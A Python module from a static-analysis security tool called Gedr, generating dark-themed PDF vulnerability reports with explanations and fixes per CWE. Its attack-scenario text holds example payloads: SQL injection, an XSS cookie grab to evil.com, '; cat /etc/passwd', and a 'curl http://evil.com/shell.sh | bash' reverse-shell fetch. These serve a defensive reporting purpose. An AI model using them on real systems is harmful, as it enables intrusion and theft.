"""
PDF report generator - Apple Security Bounty inspired design.
Dark theme, card-based layout, clean typography.
"""
from datetime import datetime
from pathlib import Path
import unicodedata

from fpdf import FPDF

REPORTS_DIR = Path(__file__).resolve().parent.parent / "reports" / "output"
REPORTS_DIR.mkdir(parents=True, exist_ok=True)

# Apple-inspired dark palette
BG = (17, 17, 19)
CARD = (28, 28, 30)
CARD_LIGHT = (44, 44, 46)
WHITE = (255, 255, 255)
LW = (245, 245, 247)
GRAY = (142, 142, 147)
DK = (99, 99, 102)
BLUE = (10, 132, 255)
GREEN = (48, 209, 88)
ORANGE = (255, 159, 10)
RED = (255, 69, 58)
AMBER = (255, 214, 10)
PURPLE = (175, 82, 222)
TEAL = (100, 210, 255)
SEV = {"Critical": RED, "High": ORANGE, "Medium": AMBER, "Low": GREEN}


def _cl(t):
    if t is None: return ""
    if not isinstance(t, str): t = str(t)
    for s, d in {"\u0259":"e","\u2014":" - ","\u2013":" - ","\u2018":"'","\u2019":"'",
        "\u201c":'"',"\u201d":'"',"\u2026":"...","\u2192":" -> ","\u2190":" <- ",
        "\u2022":"*","\u00a0":" "}.items(): t = t.replace(s, d)
    t = unicodedata.normalize("NFKD", t)
    t = "".join(c for c in t if not unicodedata.combining(c))
    return t.encode("latin-1", "replace").decode("latin-1")


class ApplePDF(FPDF):
    def header(self):
        if self.page_no() > 1:
            self.set_fill_color(*BG)
            self.rect(0, 0, 210, 297, "F")
            self.set_y(15)

    def footer(self):
        pass


class SecurityReportGenerator:
    def __init__(self):
        self._reset()

    def _reset(self):
        self.p = ApplePDF()
        self.p.set_auto_page_break(auto=True, margin=15)
        self.p.set_margins(15, 15, 15)

    def _bg(self):
        self.p.set_fill_color(*BG)
        self.p.rect(0, 0, 210, 297, "F")

    def _tw(self, text, sz=10, st="", cl=None, al="L"):
        self.p.set_font("Helvetica", st, sz)
        self.p.set_text_color(*(cl or WHITE))
        self.p.set_x(self.p.l_margin)
        self.p.multi_cell(self.p.w - self.p.l_margin - self.p.r_margin, sz * 0.42, _cl(text), align=al)

    def _twl(self, text, sz=10, st="", cl=None, al="L"):
        self.p.set_font("Helvetica", st, sz)
        self.p.set_text_color(*(cl or WHITE))
        self.p.set_x(self.p.l_margin)
        self.p.cell(self.p.w - self.p.l_margin - self.p.r_margin, sz * 0.42, _cl(text), align=al, ln=True)

    def _g(self, h=5): self.p.ln(h)

    def _hr(self):
        self.p.set_draw_color(*DK)
        self.p.set_line_width(0.2)
        self.p.line(15, self.p.get_y(), 195, self.p.get_y())
        self.p.ln(4)

    def _card(self, x, y, w, h, cl=CARD):
        self.p.set_fill_color(*cl)
        self.p.rect(x, y, w, h, "F")

    def _grade(self, s):
        try: s = int(s)
        except: return "N/A"
        if s >= 90: return "A+"
        if s >= 80: return "A"
        if s >= 70: return "B"
        if s >= 50: return "C"
        if s >= 30: return "D"
        return "F"

    def _gcl(self, g):
        if g.startswith("A"): return GREEN
        if g == "B": return BLUE
        if g == "C": return ORANGE
        return RED

    def generate(self, project, scan, findings, recommendations, output_path=None):
        self._reset()
        project = {k: _cl(v) for k, v in (project or {}).items()}
        scan = {k: _cl(v) for k, v in (scan or {}).items()}
        findings = [{k: _cl(v) for k, v in f.items()} for f in (findings or [])]
        recommendations = {k: {k2: _cl(v2) for k2, v2 in v.items()} for k, v in (recommendations or {}).items()}
        self._cover(project, scan)
        self._summary(scan, findings)
        for idx, f in enumerate(findings, 1):
            self._finding(idx, f, recommendations)
        self._methodology()
        self._contact()
        out = output_path or (REPORTS_DIR / f"security_report_{scan['id']}.pdf")
        self.p.output(str(out))
        return out

    def _cover(self, project, scan):
        p = self.p
        p.add_page()
        self._bg()
        # Apple logo area accent
        self._card(0, 0, 210, 4, BLUE)
        p.ln(55)
        self._twl(project.get("name", "Security Report"), sz=42, st="B", cl=WHITE)
        self._g(4)
        self._twl("Security Assessment Report", sz=16, cl=GRAY)
        self._g(4)
        self._twl("Generated by Gedr", sz=10, cl=DK)
        self._g(25)
        # Details card
        cy = p.get_y()
        self._card(15, cy, 180, 65, CARD)
        p.set_y(cy + 10)
        for lb, vl in [("Project", project.get("name","-")), ("Language", project.get("language","-")),
                        ("Scan ID", scan.get("id","-")), ("Date", datetime.utcnow().strftime("%B %d, %Y")),
                        ("Status", scan.get("status","-"))]:
            p.set_x(25)
            p.set_font("Helvetica", "", 9)
            p.set_text_color(*GRAY)
            p.cell(30, 8, lb.upper())
            p.set_font("Helvetica", "", 10)
            p.set_text_color(*WHITE)
            p.cell(0, 8, str(vl), ln=True)
        p.set_y(cy + 75)
        self._hr()
        self._twl("Confidential - For Authorized Recipients Only", sz=8, cl=DK, al="C")

    def _summary(self, scan, findings):
        p = self.p
        p.add_page()
        self._bg()
        self._twl("Executive Summary", sz=28, st="B", cl=WHITE)
        self._g(6)
        self._hr()
        self._g(4)
        self._tw(scan.get("summary") or "No summary available.", sz=11, cl=GRAY)
        self._g(12)
        # Score card
        score = scan.get("security_score", 100)
        grade = self._grade(score)
        gc = self._gcl(grade)
        cy = p.get_y()
        self._card(15, cy, 180, 55, CARD)
        p.set_y(cy + 8)
        self._twl("SECURITY SCORE", sz=8, st="B", cl=DK, al="C")
        p.set_y(p.get_y() + 3)
        self._twl(str(score), sz=52, st="B", cl=WHITE, al="C")
        p.set_y(p.get_y() + 3)
        self._twl(f"Grade: {grade}", sz=16, st="B", cl=gc, al="C")
        p.set_y(cy + 62)
        self._g(8)
        # Findings by severity
        self._twl("Findings", sz=20, st="B", cl=WHITE)
        self._g(6)
        bd = {"Critical": 0, "High": 0, "Medium": 0, "Low": 0}
        for f in findings: bd[f.get("severity", "Low")] += 1
        card_y = p.get_y()
        self._card(15, card_y, 180, 60, CARD)
        p.set_y(card_y + 8)
        for sev in ("Critical", "High", "Medium", "Low"):
            ct = bd[sev]
            cl = SEV[sev]
            p.set_x(25)
            p.set_font("Helvetica", "B", 11)
            p.set_text_color(*cl)
            p.cell(40, 10, sev.upper())
            p.set_font("Helvetica", "", 11)
            p.set_text_color(*WHITE)
            p.cell(0, 10, f"{ct} finding{'s' if ct != 1 else ''}", ln=True)
        p.set_y(card_y + 68)

    def _finding(self, idx, f, recs):
        p = self.p
        sev = f.get("severity", "Low")
        cl = SEV.get(sev, GRAY)
        title = f.get("title", "Untitled")
        if p.get_y() + 100 > 270:
            p.add_page()
            self._bg()
        # Severity header card
        cy = p.get_y()
        self._card(15, cy, 180, 22, cl)
        p.set_y(cy + 4)
        p.set_x(22)
        self._twl(f"Finding #{idx}", sz=8, st="B", cl=WHITE)
        p.set_x(22)
        self._twl(title, sz=14, st="B", cl=WHITE)
        p.set_y(cy + 26)
        # Meta card
        cy = p.get_y()
        self._card(15, cy, 180, 12, CARD)
        p.set_y(cy + 3)
        p.set_x(22)
        p.set_font("Helvetica", "", 8)
        p.set_text_color(*GRAY)
        meta = f"File: {f.get("file","?")}  |  Line: {f.get("line","?")}  |  Scanner: {f.get("scanner","?")}"
        p.cell(168, 6, meta)
        p.set_y(cy + 15)
        # CWE / OWASP card
        cy = p.get_y()
        self._card(15, cy, 180, 10, CARD)
        p.set_y(cy + 2)
        p.set_x(22)
        p.set_font("Helvetica", "B", 8)
        p.set_text_color(*GRAY)
        p.cell(14, 6, "CWE:")
        p.set_font("Helvetica", "", 8)
        p.set_text_color(*BLUE)
        p.cell(45, 6, f.get("cwe", "-"))
        p.set_font("Helvetica", "B", 8)
        p.set_text_color(*GRAY)
        p.cell(18, 6, "OWASP:")
        p.set_font("Helvetica", "", 8)
        p.set_text_color(*BLUE)
        p.cell(0, 6, f.get("owasp", "-"))
        p.set_y(cy + 12)
        # Vulnerable code
        if f.get("code"):
            self._g(3)
            cy = p.get_y()
            self._card(15, cy, 180, 16, CARD)
            self.p.set_fill_color(*RED)
            self.p.rect(15, cy, 4, 16, "F")
            p.set_y(cy + 2)
            p.set_x(23)
            self._twl("VULNERABLE CODE", sz=7, st="B", cl=RED)
            p.set_x(23)
            p.set_font("Courier", "", 7)
            p.set_text_color(*GRAY)
            code = _cl(f["code"][:165]).replace("\n", " ")
            p.cell(168, 5, code)
            p.set_y(cy + 18)
        # Detailed sections
        self._g(3)
        self._detail_sections(f, recs)
        rec = recs.get(f.get("finding_id") or f.get("id"))
        if rec:
            self._ai_section(rec)
        self._g(4)
        self._hr()
        self._g(2)

    def _detail_sections(self, f, recs):
        p = self.p
        sections = [
            ("WHAT IS THIS VULNERABILITY?", PURPLE, self._gen_explanation(f)),
            ("POTENTIAL IMPACT", RED, self._gen_impact(f)),
            ("ROOT CAUSE", ORANGE, self._gen_root_cause(f)),
            ("ATTACK SCENARIO", RED, self._gen_attack(f)),
            ("RECOMMENDED FIX", GREEN, self._gen_fix(f)),
        ]
        for label, color, text in sections:
            if p.get_y() + 25 > 270:
                p.add_page()
                self._bg()
            cy = p.get_y()
            self._card(15, cy, 180, 10, CARD)
            self.p.set_fill_color(*color)
            self.p.rect(15, cy, 4, 10, "F")
            p.set_y(cy + 2)
            p.set_x(23)
            self._twl(label, sz=8, st="B", cl=color)
            p.set_y(cy + 12)
            p.set_x(23)
            self._tw(_cl(text), sz=9, cl=LW)
            self._g(3)
        sec_code = self._gen_secure_code(f)
        if sec_code:
            self._g(2)
            cy = p.get_y()
            self._card(15, cy, 180, 14, CARD)
            self.p.set_fill_color(*GREEN)
            self.p.rect(15, cy, 4, 14, "F")
            p.set_y(cy + 2)
            p.set_x(23)
            self._twl("SECURE CODE EXAMPLE", sz=7, st="B", cl=GREEN)
            p.set_x(23)
            p.set_font("Courier", "", 7)
            p.set_text_color(*LW)
            p.cell(168, 5, _cl(sec_code[:165]))
            p.set_y(cy + 16)

    def _ai_section(self, rec):
        p = self.p
        if p.get_y() + 30 > 270:
            p.add_page()
            self._bg()
        cy = p.get_y()
        self._card(15, cy, 180, 10, CARD)
        self.p.set_fill_color(*BLUE)
        self.p.rect(15, cy, 4, 10, "F")
        p.set_y(cy + 2)
        p.set_x(23)
        self._twl("AI SECURITY ANALYSIS", sz=8, st="B", cl=BLUE)
        p.set_y(cy + 12)
        for key, label in [("explanation","Analysis:"), ("impact","Impact:"), ("attack_scenario","Attack Vector:"), ("recommended_fix","Remediation:")]:
            if rec.get(key):
                p.set_x(23)
                self._twl(label, sz=8, st="B", cl=GRAY)
                p.set_x(23)
                self._tw(_cl(rec[key][:300]), sz=9, cl=LW)
                self._g(2)
        if rec.get("secure_code"):
            cy = p.get_y()
            self._card(23, cy, 170, 12, CARD)
            self.p.set_fill_color(*GREEN)
            self.p.rect(23, cy, 3, 12, "F")
            p.set_y(cy + 2)
            p.set_x(30)
            self._twl("SECURE CODE", sz=7, st="B", cl=GREEN)
            p.set_x(30)
            p.set_font("Courier", "", 7)
            p.set_text_color(*LW)
            p.cell(160, 5, _cl(rec["secure_code"][:158]))
            p.set_y(cy + 14)

    def _gen_explanation(self, f):
        cwe = f.get("cwe", "")
        title = f.get("title", "This issue")
        explanations = {
            "CWE-89": f"{title} allows untrusted user input to be directly concatenated into a SQL query. The code constructs SQL statements using string interpolation instead of parameterized queries (prepared statements). This means an attacker can inject arbitrary SQL commands through input fields, potentially reading, modifying, or deleting database records. The vulnerability exists because the application trusts user-supplied data without sanitizing or encoding it before inclusion in the SQL statement.",
            "CWE-79": f"{title} detected. The application outputs user-controlled data directly into HTML without proper encoding or sanitization. An attacker can inject malicious JavaScript code through input fields that are later rendered in the browser. When other users view the page, the injected script executes in their browser context, enabling session hijacking, cookie theft, or phishing attacks. The root cause is missing output encoding for the HTML context.",
            "CWE-78": f"{title} found. The code passes user-controlled input to a system command (shell execution) without proper validation or argument sanitization. An attacker can inject shell metacharacters (pipes, semicolons, backticks) to execute arbitrary operating system commands on the server. This can lead to complete system compromise, data exfiltration, or lateral movement within the network.",
            "CWE-120": f"{title} in the code. The code writes data to a fixed-size buffer without checking if the input exceeds the buffer capacity. An attacker can supply oversized input that overwrites adjacent memory, potentially hijacking control flow or executing arbitrary code. This is a memory corruption vulnerability that can lead to crashes, privilege escalation, or remote code execution.",
            "CWE-502": f"{title} detected. The application deserializes untrusted data without validating the object type. An attacker can craft a malicious serialized payload containing executable code that runs automatically during deserialization. This can lead to remote code execution, denial of service, or privilege escalation.",
            "CWE-798": f"{title} found. Hard-coded credentials (API keys, passwords, tokens) are embedded directly in the source code. Anyone with access to the codebase can extract these credentials. If the code is published or leaked, attackers can use the credentials to access protected systems, databases, or third-party services.",
            "CWE-434": f"{title} in the code. The application accepts file uploads without properly validating the file type, content, or size. An attacker can upload malicious files (webshells, executables) that may be executed on the server, stored in publicly accessible locations, or processed by other users.",
        }
        return explanations.get(cwe, f"{title} was identified in {f.get("file","the file")} at line {f.get("line",0)} by the {f.get("scanner","heuristic")} scanner. This is classified as {f.get("severity","Low")} severity ({cwe}). The vulnerability exists because the code does not properly validate, sanitize, or encode untrusted input before processing it. An attacker can exploit this weakness to perform unauthorized actions, access sensitive data, or compromise the application.")

    def _gen_impact(self, f):
        cwe = f.get("cwe", "")
        impacts = {
            "CWE-89": "Complete database compromise: attackers can read all data (including passwords and PII), modify or delete records, execute admin operations, and in some cases execute operating system commands on the database server.",
            "CWE-79": "Session hijacking through cookie theft, credential harvesting via keyloggers, phishing attacks using injected forms, defacement of web pages, and redirection to malicious sites.",
            "CWE-78": "Full remote code execution on the server. Attackers can install backdoors, create new admin accounts, exfiltrate all data, encrypt files for ransom, or use the compromised server as a pivot point.",
            "CWE-120": "Memory corruption leading to crashes, denial of service, or remote code execution. Buffer overflows can be chained with other vulnerabilities to gain root access.",
            "CWE-502": "Remote code execution through crafted serialized objects. Attackers can execute arbitrary commands, create admin accounts, exfiltrate data, or deploy ransomware.",
            "CWE-798": "Unauthorized access to all systems protected by the exposed credentials. Attackers can access customer data, modify infrastructure, or incur significant costs.",
            "CWE-434": "Server compromise through uploaded webshells, defacement of web content, data theft from uploaded files, or execution of malicious code when files are processed.",
        }
        return impacts.get(cwe, "An attacker can exploit this vulnerability to perform unauthorized actions, access sensitive data beyond their permission level, modify application behavior, or compromise the confidentiality, integrity, or availability of the system.")

    def _gen_root_cause(self, f):
        cwe = f.get("cwe", "")
        causes = {
            "CWE-89": "The developer used string concatenation or f-strings to build SQL queries instead of parameterized queries. The application trusts user input to be safe for inclusion in SQL, but this assumption is incorrect.",
            "CWE-79": "The application outputs user-controlled data into HTML without context-aware encoding. The developer assumed the input was safe or relied on client-side validation, but validation must happen server-side.",
            "CWE-78": "The code passes user input to os.system() or subprocess.call(shell=True). The developer did not use argument lists (shell=False) or validate input against a strict allowlist.",
            "CWE-120": "The code uses unsafe functions (strcpy, sprintf, gets) that do not perform bounds checking. The developer did not verify that the input length is within the buffer capacity.",
            "CWE-502": "The application uses pickle.loads() or yaml.load() on untrusted data without restricting allowed classes. The fix is to use safe formats (JSON) or implement class allowlists.",
            "CWE-798": "Developers embedded credentials directly in source code for convenience during development, and these values were never moved to environment variables before production deployment.",
            "CWE-434": "The application accepts file uploads without validating the MIME type, file extension, or content. The developer relied on client-side checks without server-side verification.",
        }
        return causes.get(cwe, "The vulnerability exists because the application does not properly validate, sanitize, or encode untrusted input before processing it. The developer trusted user-supplied data without implementing server-side validation.")

    def _gen_attack(self, f):
        cwe = f.get("cwe", "")
        attacks = {
            "CWE-89": "1) Identify an input field (login form, search box). 2) Enter SQL injection payload: \' OR \'1\'=\'1\' UNION SELECT username, password FROM users-- 3) The application executes the injected query and returns all usernames and passwords. 4) Use extracted credentials to access the admin panel.",
            "CWE-79": "1) Find a comment field or profile page. 2) Enter: <script>document.location=http://evil.com/steal?c=</script> 3) When an admin views the page, their session cookie is sent to the attacker. 4) Use the stolen cookie to impersonate the admin.",
            "CWE-78": "1) Find a file rename or ping utility. 2) Enter: ; cat /etc/passwd 3) The server executes the command and returns the password file. 4) Use: ; curl http://evil.com/shell.sh | bash 5) The server downloads and executes a reverse shell.",
            "CWE-120": "1) Identify a fixed-size buffer (char buf[64]). 2) Provide 256 bytes of input with shellcode. 3) The overflow overwrites the return pointer. 4) When the function returns, execution jumps to the attacker shellcode.",
            "CWE-502": "1) Find an API that accepts serialized data. 2) Create a malicious pickle payload. 3) Submit the payload. 4) The server deserializes it and executes the embedded command.",
            "CWE-798": "1) Browse the public GitHub repository. 2) Find hardcoded credentials in config.py. 3) Use the key to access cloud services. 4) Download customer database backups and sensitive files.",
            "CWE-434": "1) Find the file upload form. 2) Create a PHP webshell. 3) Upload as image.php with a .jpg extension. 4) Access http://site.com/uploads/image.php?cmd=cat /etc/passwd.",
        }
        return attacks.get(cwe, "1) Identify the vulnerable input vector. 2) Craft a malicious payload. 3) Submit the payload to the application. 4) The application processes the malicious input without validation. 5) Achieve the desired impact.")

    def _gen_fix(self, f):
        cwe = f.get("cwe", "")
        fixes = {
            "CWE-89": "Replace string concatenation with parameterized queries. Use: cursor.execute(\'SELECT * FROM users WHERE id = ?\', (user_id,)) instead of cursor.execute(f\'SELECT * FROM users WHERE id = {user_id}\'). Enable ORM-level input validation.",
            "CWE-79": "Apply context-aware output encoding. For HTML: use html.escape(). For JavaScript: use json.dumps() or encodeURIComponent(). For URLs: use urllib.parse.quote(). Implement Content Security Policy headers.",
            "CWE-78": "Never use shell=True with user input. Use subprocess.run([cmd, arg1, arg2], shell=False) with argument lists. Validate input against a strict allowlist of permitted values.",
            "CWE-120": "Replace unsafe functions: use strncpy_s() instead of strcpy(), snprintf() instead of sprintf(). Always check buffer capacity before copying.",
            "CWE-502": "Never deserialize untrusted data. Use JSON (json.loads()) instead of pickle. If pickle is required, implement a class allowlist.",
            "CWE-798": "Move all credentials to environment variables: os.environ[\'API_KEY\']. Use a secrets manager. Rotate exposed credentials immediately.",
            "CWE-434": "Validate file type using magic numbers (file content), not just extension. Set a maximum file size. Store uploads outside the web root.",
        }
        return fixes.get(cwe, "Implement proper input validation on the server side. Use secure coding frameworks. Apply the principle of least privilege.")

    def _gen_secure_code(self, f):
        cwe = f.get("cwe", "")
        codes = {
            "CWE-89": "cursor.execute(\'SELECT * FROM users WHERE id = ? AND active = ?\', (user_id, True))",
            "CWE-79": "from html import escape; page += escape(user_input)",
            "CWE-78": "subprocess.run([\'ping\', \'-c\', \'1\', user_input], shell=False)",
            "CWE-120": "snprintf(buf, sizeof(buf), \'%s\', src);",
            "CWE-502": "data = json.loads(payload)",
            "CWE-798": "api_key = os.environ.get(\'API_KEY\')",
            "CWE-434": "if file.content_type in ALLOWED_TYPES and file.size < MAX_SIZE: save(file)",
        }
        return codes.get(cwe, "")

    def _methodology(self):
        p = self.p
        p.add_page()
        self._bg()
        self._twl("Methodology", sz=28, st="B", cl=WHITE)
        self._g(6)
        self._hr()
        self._g(6)
        # Platform card
        cy = p.get_y()
        self._card(15, cy, 180, 40, CARD)
        p.set_y(cy + 8)
        p.set_x(23)
        self._twl("PLATFORM", sz=8, st="B", cl=BLUE)
        p.set_x(23)
        self._tw(
            "Gedr is a static application security testing (SAST) platform combining "
            "multi-layer vulnerability detection with AI-powered security reasoning.",
            sz=10, cl=LW
        )
        p.set_y(cy + 45)
        self._g(4)
        # Detection layers card
        cy = p.get_y()
        self._card(15, cy, 180, 65, CARD)
        p.set_y(cy + 8)
        p.set_x(23)
        self._twl("DETECTION ARCHITECTURE", sz=8, st="B", cl=BLUE)
        p.set_y(cy + 18)
        for tag, name, desc in [
            ("Layer 1", "Heuristic Engine", "Built-in pattern matching, zero dependencies"),
            ("Layer 2", "External Tools", "Bandit, Semgrep, SpotBugs, PMD, Clang"),
            ("Layer 3", "Dependency Scanning", "pip-audit, npm-audit, composer-audit"),
            ("Layer 4", "AI Analysis", "Security reasoning and remediation guidance"),
        ]:
            p.set_x(23)
            p.set_font("Helvetica", "B", 9)
            p.set_text_color(*GRAY)
            p.cell(20, 6, tag)
            p.set_font("Helvetica", "", 9)
            p.set_text_color(*WHITE)
            p.cell(50, 6, name)
            p.set_font("Helvetica", "", 8)
            p.set_text_color(*GRAY)
            p.cell(0, 6, f"- {desc}", ln=True)
        p.set_y(cy + 70)
        self._g(4)
        # Classification card
        cy = p.get_y()
        self._card(15, cy, 180, 55, CARD)
        p.set_y(cy + 8)
        p.set_x(23)
        self._twl("VULNERABILITY CLASSIFICATION", sz=8, st="B", cl=BLUE)
        p.set_x(23)
        self._tw("All findings mapped to CWE and OWASP Top 10 (2021).", sz=9, cl=LW)
        p.set_y(cy + 28)
        for sev, desc in [("Critical (9-10)", "Immediate exploitation risk"), ("High (7-8)", "Significant security impact"),
                          ("Medium (4-6)", "Moderate risk requiring attention"), ("Low (1-3)", "Minor issues or hardening")]:
            p.set_x(23)
            p.set_font("Helvetica", "B", 9)
            p.set_text_color(*SEV.get(sev.split()[0], GRAY))
            p.cell(35, 6, sev)
            p.set_font("Helvetica", "", 9)
            p.set_text_color(*LW)
            p.cell(0, 6, desc, ln=True)
        p.set_y(cy + 60)
        self._g(4)
        # Scoring card
        cy = p.get_y()
        self._card(15, cy, 180, 40, CARD)
        p.set_y(cy + 8)
        p.set_x(23)
        self._twl("SCORING MODEL", sz=8, st="B", cl=BLUE)
        p.set_x(23)
        self._tw("Security score starts at 100, deducts weighted penalties.", sz=9, cl=LW)
        p.set_x(23)
        self._tw("Critical: -30 | High: -15 | Medium: -6 | Low: -2", sz=9, cl=LW)
        p.set_x(23)
        self._tw("Grades: A+ (90-100) | A (80-89) | B (70-79) | C (50-69) | D (30-49) | F (<30)", sz=9, cl=LW)

    def _contact(self):
        p = self.p
        p.add_page()
        self._bg()
        p.ln(60)
        self._twl("Thank you for using Gedr", sz=26, st="B", cl=WHITE, al="C")
        self._g(8)
        self._twl("AI-Enhanced Multi-Language Security Analyzer", sz=12, cl=GRAY, al="C")
        self._g(35)
        self._hr()
        self._g(15)
        cy = p.get_y()
        self._card(40, cy, 130, 12, CARD)
        p.set_y(cy + 2)
        self._twl("GitHub", sz=8, st="B", cl=DK, al="C")
        self._twl("https://github.com/natahanjr", sz=10, cl=BLUE, al="C")
        self._g(10)
        cy = p.get_y()
        self._card(40, cy, 130, 12, CARD)
        p.set_y(cy + 2)
        self._twl("Email", sz=8, st="B", cl=DK, al="C")
        self._twl("gedr21@hotmail.com", sz=10, cl=BLUE, al="C")
